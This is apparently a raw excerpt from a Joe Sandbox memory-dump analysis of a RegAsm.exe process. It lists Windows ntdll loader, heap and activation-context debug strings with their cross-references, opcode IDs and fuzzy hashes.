                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                  • API String ID: 0-4009184096
                                                  • Opcode ID: 8ba0d15185bbbc120f9fc4b32b6d72d53063e707aa0e5e8456e97703b63068ba
                                                  • Instruction ID: 116d92b242102f3004c6c941080d4d822065513388c7d22f22c1f8e7fbfa478b
                                                  • Opcode Fuzzy Hash: 8ba0d15185bbbc120f9fc4b32b6d72d53063e707aa0e5e8456e97703b63068ba
                                                  • Instruction Fuzzy Hash: E30251FDD002689BEB21DB14CC80BA9B7B9AB44314F0441DAEB0DE7285D7709E84CF99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  • Opcode ID: 89e8240fef388d47788f772b934261d55fa358c8bc7f0a44655fe62bfd74ef06
                                                  • Instruction ID: 0f666af92c6f1258b3525fa4a9c9a4aa260bc20550b54de5b7118ea7e2ef44a0
                                                  • Opcode Fuzzy Hash: 89e8240fef388d47788f772b934261d55fa358c8bc7f0a44655fe62bfd74ef06
                                                  • Instruction Fuzzy Hash: DB51F17E6053559BE364DF198844BABB7E8FF84348F14491DFA99C3240E770D648CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 0-1700792311
                                                  • Opcode ID: 27970531c2f616df5a772506de34dfad4ed1923fb51176eecd022a469b7cb491
                                                  • Instruction ID: 659b5b345fda31cde35ba63ee0460423cb62519fe71f54fa5514ea02b6378ceb
                                                  • Opcode Fuzzy Hash: 27970531c2f616df5a772506de34dfad4ed1923fb51176eecd022a469b7cb491
                                                  • Instruction Fuzzy Hash: 6FD10339944689EFDB11DFA8C480BADBBF6FF49708F088449E4499B291DB38D981CF15
                                                  Strings
                                                  • VerifierDlls, xrefs: 028D8CBD
                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 028D8A67
                                                  • VerifierFlags, xrefs: 028D8C50
                                                  • VerifierDebug, xrefs: 028D8CA5
                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 028D8A3D
                                                  • AVRF: -*- final list of providers -*- , xrefs: 028D8B8F
                                                  • HandleTraces, xrefs: 028D8C8F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                  • API String ID: 0-3223716464
                                                  • Opcode ID: 037de7a0e953419f5c06b8553df325a0900d034e7a87f157721af95d98e451fa
                                                  • Instruction ID: cbc5199693ab434e2289f8c153e8912615282dc1d4802da5dc2d7248a35b6628
                                                  • Opcode Fuzzy Hash: 037de7a0e953419f5c06b8553df325a0900d034e7a87f157721af95d98e451fa
                                                  • Instruction Fuzzy Hash: 8691367EA45714EFE321EF688880F2B73E5AF44718F450859F945EB280D770AC1ACB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                  • API String ID: 0-1109411897
                                                  • Opcode ID: cfd7ca1dec488e5b72255d2ed93163aac07bce206c0999b3862a3f13ae97a587
                                                  • Instruction ID: 599b38b3ec7bae390a07b107029f1f893b2071ce828cb9485cf4ba4b09f7f7c3
                                                  • Opcode Fuzzy Hash: cfd7ca1dec488e5b72255d2ed93163aac07bce206c0999b3862a3f13ae97a587
                                                  • Instruction Fuzzy Hash: 1DA2377CA056698BDB65CF18CC98BA9B7B5AF49308F1482E9D90DE7751DB309E84CF00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-792281065
                                                  • Opcode ID: f9c00b9ca4efb17da47f70268e1e47a35013ba12819f963fa6c039ae776cf426
                                                  • Instruction ID: f74af5b06504538c665971cea47e8c09463c1b3fa72a8a86efb79f1b64d81097
                                                  • Opcode Fuzzy Hash: f9c00b9ca4efb17da47f70268e1e47a35013ba12819f963fa6c039ae776cf426
                                                  • Instruction Fuzzy Hash: 1991687CE403249BEB24EF68D855FAE77E5AF00728F24415DE905EB384EB749840CB91
                                                  Strings
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 028A99ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 028A9A01
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028A9A11, 028A9A3A
                                                  • LdrpInitShimEngine, xrefs: 028A99F4, 028A9A07, 028A9A30
                                                  • apphelp.dll, xrefs: 02846496
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 028A9A2A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-204845295
                                                  • Opcode ID: 82aec0cc697d15a0eb87b75136fbffeeb886588d2ade3d7cc70e2768aa1f93b9
                                                  • Instruction ID: cc9e8e9c24942dae0af9dcb740b819f2e6e6d6750de1aeb263355457f36427a1
                                                  • Opcode Fuzzy Hash: 82aec0cc697d15a0eb87b75136fbffeeb886588d2ade3d7cc70e2768aa1f93b9
                                                  • Instruction Fuzzy Hash: D851B07D6483189FF320DF28D851F6B77E9AB84748F10491AF586DB260EB30E914CB92
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0288C6C3
                                                  • LdrpInitializeProcess, xrefs: 0288C6C4
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 028C8181, 028C81F5
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 028C81E5
                                                  • Loading import redirection DLL: '%wZ', xrefs: 028C8170
                                                  • LdrpInitializeImportRedirection, xrefs: 028C8177, 028C81EB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  • Opcode ID: da0cc2e890ee7a778aff2be94da9ca1909186f5223d0f1dc70eedca5fd18e5ad
                                                  • Instruction ID: b7d11974728292d4ae70dce3b1247d4a23d752214c5748995cea668033f03c98
                                                  • Opcode Fuzzy Hash: da0cc2e890ee7a778aff2be94da9ca1909186f5223d0f1dc70eedca5fd18e5ad
                                                  • Instruction Fuzzy Hash: 9E31D37E6883459BD214EB28DD45E2AB7E5AF84B14F04056CF985EB392E734DC04CBA3
                                                  Strings
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 028C2180
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 028C219F
                                                  • RtlGetAssemblyStorageRoot, xrefs: 028C2160, 028C219A, 028C21BA
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 028C21BF
                                                  • SXS: %s() passed the empty activation context, xrefs: 028C2165
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 028C2178
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: 8fa99651638e39577bcf0ac89a9ba36cd37a3b70b51678256376857722bbda9f
                                                  • Instruction ID: af6ae474a70f94eda34c694fc8320b5aa644144c3b2eef0fd8a213704eba7e1a
                                                  • Opcode Fuzzy Hash: 8fa99651638e39577bcf0ac89a9ba36cd37a3b70b51678256376857722bbda9f
                                                  • Instruction Fuzzy Hash: FF31557EB402647BF721AA998C41F6BB769DB55B44F05405AFE0AE7388D370EA00C7E1
                                                  APIs
                                                    • Part of subcall function 02892DF0: LdrInitializeThunk.NTDLL ref: 02892DFA
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890BA3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890BB6
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890D60
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890D74
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                  • String ID:
                                                  • API String ID: 1404860816-0
                                                  • Opcode ID: 5964f79f2a6dc71783191294c425cca633493615618a2bfb19c001e23ddff4c6
                                                  • Instruction ID: 908d52c28ba60e9000123915c86872a7d11f7e44b786913a1f0ca3de5390c4e2
                                                  • Opcode Fuzzy Hash: 5964f79f2a6dc71783191294c425cca633493615618a2bfb19c001e23ddff4c6
                                                  • Instruction Fuzzy Hash: A3425B79900715DFDB60CF28C880BAAB7F5BF44314F1845A9E989EB241E770EA84CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  • Opcode ID: 941fd2faa1f50cd1507ab073f0a3bf3f7cd14b71554dd9f1b64cd7453b7dceff
                                                  • Instruction ID: 0bb30c76bfbe87d1499be633bfffa24740dc8b4a25b2c61d2db6be30835ff8a3
                                                  • Opcode Fuzzy Hash: 941fd2faa1f50cd1507ab073f0a3bf3f7cd14b71554dd9f1b64cd7453b7dceff
                                                  • Instruction Fuzzy Hash: 83C1697C1083968BD719CF58C484B6AB7E4BF88748F048A6AFD99CB350E734D949CB52
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02888421
                                                  • LdrpInitializeProcess, xrefs: 02888422
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0288855E
                                                  • @, xrefs: 02888591
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1918872054
                                                  • Opcode ID: 8c8be3ba5a32ed3adfd90fd7255d500802bf74cdf0107d41d33862502081ddb8
                                                  • Instruction ID: ca6ff085a2da46ac84e82e5e29b9969e6fbe4e0ac05bf54356798862251e8a3c
                                                  • Opcode Fuzzy Hash: 8c8be3ba5a32ed3adfd90fd7255d500802bf74cdf0107d41d33862502081ddb8
                                                  • Instruction Fuzzy Hash: 5D919F7D508348AFEB21EB64CC44F6BB7E9AF84754F84092EFA88D2151E334D944CB62
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 028C21DE
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 028C21D9, 028C22B1
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 028C22B6
                                                  • .Local, xrefs: 028828D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  • Opcode ID: 9b836450ee6fd429ad2013deabbf14ddc0d8b1b9e968ac6040dd8e0e88590125
                                                  • Instruction ID: 16bda5399343388ed1db002396c0a4a806d5ba7f8f05ed6a2f8f686883821962
                                                  • Opcode Fuzzy Hash: 9b836450ee6fd429ad2013deabbf14ddc0d8b1b9e968ac6040dd8e0e88590125
                                                  • Instruction Fuzzy Hash: ADA17F3D9002699BDB24DF64CC84BA9B3B1BF58318F2441EADC08E7299D7709E80CF91
                                                  Strings
                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 028C342A
                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 028C3456
                                                  • RtlDeactivateActivationContext, xrefs: 028C3425, 028C3432, 028C3451
                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 028C3437
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                  • API String ID: 0-1245972979
                                                  • Opcode ID: 8200445ca4245a5182706c51bd8a9fe46c0beac0cb5aba6840fbc7509031a330
                                                  • Instruction ID: 74ced9044b77216a7d4f4d2c32ade464f2e3e7291c0ab0eb7aaed6763052ecd0
                                                  • Opcode Fuzzy Hash: 8200445ca4245a5182706c51bd8a9fe46c0beac0cb5aba6840fbc7509031a330
                                                  • Instruction Fuzzy Hash: B161F53E6407129BD722DF18C841B2AB3E6EF94B58F65C56DE859DB240DB34E801CBD1
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 028B1028
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 028B106B
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 028B0FE5
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 028B10AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  • Opcode ID: b786c09441401db80b9b3488997f3c8bc81187fccd5d0f546fb753079d713b08
                                                  • Instruction ID: 6d20a12ff9c12957d1d9a517535fb15ee24f53cd383941d36693fc9936c5381d
                                                  • Opcode Fuzzy Hash: b786c09441401db80b9b3488997f3c8bc81187fccd5d0f546fb753079d713b08
                                                  • Instruction Fuzzy Hash: A871BE7D944324AFDB21DF18C884B9B7BA9AF44764F840468FE49CA246E734D588CFD2
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028BA9A2
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 028BA992
                                                  • LdrpDynamicShimModule, xrefs: 028BA998
                                                  • apphelp.dll, xrefs: 02872462
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 5ea382022b0429ad231e5c82f38b8021f3b42fde9242d1fd20c088e3df82b46b
                                                  • Instruction ID: 9f0cc01f86adf248d9a4cd7f67160f8f3f2f34f2d156e29e16668beccbbc5df1
                                                  • Opcode Fuzzy Hash: 5ea382022b0429ad231e5c82f38b8021f3b42fde9242d1fd20c088e3df82b46b
                                                  • Instruction Fuzzy Hash: CB31487DA40205ABEB299F6C8881FBAB7F5FF85B04F25445DE815E7340C7709851CB90
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 02863255
                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0286327D
                                                  • HEAP: , xrefs: 02863264
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                  • API String ID: 0-617086771
                                                  • Opcode ID: e7b713c8d76d41a1cef197b844b1d7b186e937290b21724d48af96efbe36a6f6
                                                  • Instruction ID: 49d1e86ef6fe2351843fa7e73fef8058b82a4ecdfef5ecaff9b5bf65923669fb
                                                  • Opcode Fuzzy Hash: e7b713c8d76d41a1cef197b844b1d7b186e937290b21724d48af96efbe36a6f6
                                                  • Instruction Fuzzy Hash: D392BB78A042489FDB25CF68C448BBDBBF1EF48708F1880A9E849EB795D735A945CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 832aa82e6f31bd383e192fc3e0254f92a301f91b7602cb5811187bcd5cd8e92e
                                                  • Instruction ID: 961c0e44ded42a4b0de865c1eec9f52e382e96c1eecbab05ab242b79a8f8181e
                                                  • Opcode Fuzzy Hash: 832aa82e6f31bd383e192fc3e0254f92a301f91b7602cb5811187bcd5cd8e92e
                                                  • Instruction Fuzzy Hash: 36F17B3CA00609DFDB15CF68C898BBAB7B6FF44308F144168E45ADB391D734A981CB95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 0-2779062949
                                                  • Opcode ID: 5527a2c06f48adfac714a6b1416339102abdd174db13d34cb1b019188b65bf2c
                                                  • Instruction ID: 8bc69499408e28b14c0c6a66db56f0b5a4acd1a9166ed731624175edfa570b34
                                                  • Opcode Fuzzy Hash: 5527a2c06f48adfac714a6b1416339102abdd174db13d34cb1b019188b65bf2c
                                                  • Instruction Fuzzy Hash: 98A18E7D9012289BEB21DF64CC98BAAB7B8EF44704F1441EAE90DE7210DB359E84CF54
                                                  Strings
                                                  • Failed to allocated memory for shimmed module list, xrefs: 028BA10F
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028BA121
                                                  • LdrpCheckModule, xrefs: 028BA117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-161242083
                                                  • Opcode ID: de0697c760ed4b98bbf72c229e28ff8c306d2e4d691c9a06ec050824b565568f
                                                  • Instruction ID: 4ff34eb415be4df1b4fc50a12a6638af5fe9b5be5aec0e4e8287436ec042761a
                                                  • Opcode Fuzzy Hash: de0697c760ed4b98bbf72c229e28ff8c306d2e4d691c9a06ec050824b565568f
                                                  • Instruction Fuzzy Hash: 27718B7CA00209DBEB19DFA8C985ABEB7F5EF88708F18446DD806E7350E734A945CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: a58757bd5ff88998bcb58a9394e244c1cc953d15846e0997d3122cf9b9e6b4c9
                                                  • Instruction ID: 967aefa6be90b029621e122927c62241aec1d755e6b1b77c8fc827d9db17cb35
                                                  • Opcode Fuzzy Hash: a58757bd5ff88998bcb58a9394e244c1cc953d15846e0997d3122cf9b9e6b4c9
                                                  • Instruction Fuzzy Hash: 89619B7C6003069FDB19CF28C484BAABBE1FF45708F188459E48ACB391D774E891CB95
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028C82E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 028C82DE
                                                  • Failed to reallocate the system dirs string !, xrefs: 028C82D7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1783798831
                                                  • Opcode ID: 6b4962f9add4fc9f0491946a0f1f53b624016efa0810bdc477b7e0823ba26dec
                                                  • Instruction ID: 602bd3f5abbfdc839d860ec343c6daa7fdfacd38f104f81d15b1c9c8f7a9eda4
                                                  • Opcode Fuzzy Hash: 6b4962f9add4fc9f0491946a0f1f53b624016efa0810bdc477b7e0823ba26dec
                                                  • Instruction Fuzzy Hash: 9C4100BD988304ABD725FB78D844F6B77E9EB44718F00482AF948D3254EB30D810CBA2
                                                  Strings
                                                  • @, xrefs: 0290C1F1
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0290C1C5
                                                  • PreferredUILanguages, xrefs: 0290C212
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                  • API String ID: 0-2968386058
                                                  • Opcode ID: 65fb1b3f6b5e1c88ec54d2f929b1fb030485f5875c4bced71f7d4a1c1339f834
                                                  • Instruction ID: 12fc9773b2ccc5666bb91028407222cba7c71da9d4ed78684d5f04441934fe92
                                                  • Opcode Fuzzy Hash: 65fb1b3f6b5e1c88ec54d2f929b1fb030485f5875c4bced71f7d4a1c1339f834
                                                  • Instruction Fuzzy Hash: 5D416F7AA0020DEFDF11DAD8C881BEEB7BDAB18B04F14416BE905E7680D774DA44CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: e6524bb12c20dc530cf4c240cf58a0259b01e675c28d18663dddb6bc40c59005
                                                  • Instruction ID: b10230a50efc3cc04ff74a7450ac44e295853c71b109c7a4586ca69f725a5e03
                                                  • Opcode Fuzzy Hash: e6524bb12c20dc530cf4c240cf58a0259b01e675c28d18663dddb6bc40c59005
                                                  • Instruction Fuzzy Hash: BE41227D900258CBEF21DBE8C844BADB7B9EF46748F14049ADA0AFB781DB749901CB11
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 028D4888
